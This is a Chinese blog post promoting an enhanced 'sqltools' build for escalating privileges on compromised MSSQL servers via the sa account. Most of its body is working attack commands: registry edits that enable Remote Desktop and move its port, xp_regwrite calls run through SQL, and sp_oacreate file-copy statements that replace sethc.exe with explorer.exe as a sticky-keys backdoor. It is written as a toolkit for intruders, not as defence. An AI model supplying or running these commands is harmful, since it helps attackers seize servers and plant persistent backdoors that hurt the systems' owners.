zoukankan      html  css  js  c++  java
  • sqltools最新增强版

    此版本集成了更多的1433服务器恢复提权命令功能,对于目前sa口令许多的功能限制能有效的恢复.

    如果此版本不能恢复的,建议可以考虑放弃该服务器的提权.版权为原作者所有,特此声明

    命令集成功能说明:

    查看系统信息

    systeminfo

    查看系统终端端口状况

    REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber

    开启系统终端端口

    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
    下面两条更改终端端口为2009

    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\Wds\rdpwd\Tds\tcp /v PortNumber /t

    REG_DWORD /d 0x7d9 /f

    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber /t

    REG_DWORD /d 0x7d9 /f
    1、更改软件SQL命令处的Edit控件为ComboBox控件,增加下拉菜单功能,方便存储更多的相关命令

    2、菜单功能命令增加部分

    查看系统相关信息
    EXEC xp_msver
    查询终端端口信息
    exec master..xp_regread ‘HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp’,'PortNumber’
    开启终端端口
    xp_regwrite ‘HKEY_LOCAL_MACHINE’, ‘SYSTEM\CurrentControlSet\Control\Terminal Server’, ‘fDenyTSConnections’,'REG_DWORD’,0
    复制explorer为shift后门
    declare @o int exec sp_oacreate ‘scripting.filesystemobject’, @o out exec sp_oamethod @o, ‘copyfile’,null,’c:\windows\explorer.exe’,'c:\windows\system32\sethc.exe’;
    declare @oo int exec sp_oacreate ‘scripting.filesystemobject’, @oo out exec sp_oamethod @oo, ‘copyfile’,null,’c:\windows\system32\sethc.exe’,'c:\windows\system32\dllcache\sethc.exe’;

    sqltools深度命令成版

  • 相关阅读:
    unigui+fastreport报表打印
    MySQL索引类型总结和使用技巧以及注意事项
    Vue.js 和 MVVM
    Go -- 中结构体与字节数组能相互转化
    iOS算法合集
    postman中 form-data、x-www-form-urlencoded、raw、binary的区别
    JS注入
    JS页面间传值
    上手ReactiveCocoa之基础篇
    数据结构与算法题整理
  • 原文地址:https://www.cnblogs.com/94YY/p/2048711.html
Copyright © 2011-2022 走看看